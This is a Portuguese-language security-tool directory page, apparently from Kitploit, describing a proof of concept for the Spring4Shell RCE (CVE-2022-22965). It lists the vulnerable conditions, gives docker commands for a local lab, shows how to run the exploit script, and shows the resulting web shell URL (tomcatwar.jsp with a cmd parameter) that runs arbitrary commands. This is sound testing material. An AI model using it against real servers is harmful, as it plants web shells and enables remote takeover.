Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/netcode/spring4shell-cve-2022-22965-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubnetcode/spring4shell-cve-2022-22965-poc

Spring4shell-CVE-2022-22965-POC

Outro POC do spring4shell (RCE do Spring core)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
332há 4 anosAinda não revisado
Compartilhar

Vulnerabilidade Spring4shell RCE

Esta vulnerabilidade afeta o Spring Core e permite que um atacante envie uma solicitação HTTP especialmente elaborada para contornar as proteções no parser de solicitações HTTP da biblioteca, levando à execução remota de código.

Mais informações Aqui

Para que esta vulnerabilidade seja explorada, várias condições devem ser atendidas

  • Use JDK 9 ou superior
  • Tenha o Apache Tomcat como contêiner de servlet
  • Esteja empacotado como um WAR tradicional (em contraste com um jar executável do Spring Boot)
  • Use a dependência spring-webmvc ou spring-webflux
  • Use versões do Spring framework 5.3.0 a 5.3.17, 5.2.0 a 5.2.19, ou versões mais antigas

POC

  • Crie a imagem docker
root@kitploit:~
docker build . -t springshell-rce-poc
  • Execute o contêiner docker
root@kitploit:~
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
  • Executando o exploit
root@kitploit:~
python exploit-poc.py --url "http://127.0.0.1:8081/"

A resposta esperada

root@kitploit:~
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami

Se você acessar esta URL, ela executará qualquer comando que você quiser cmd=<whatyouwant>

Se você acessar o contêiner via ssh, verá que um novo arquivo foi criado tomcatwar.jsp

root@kitploit:~
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT
Baixar ferramenta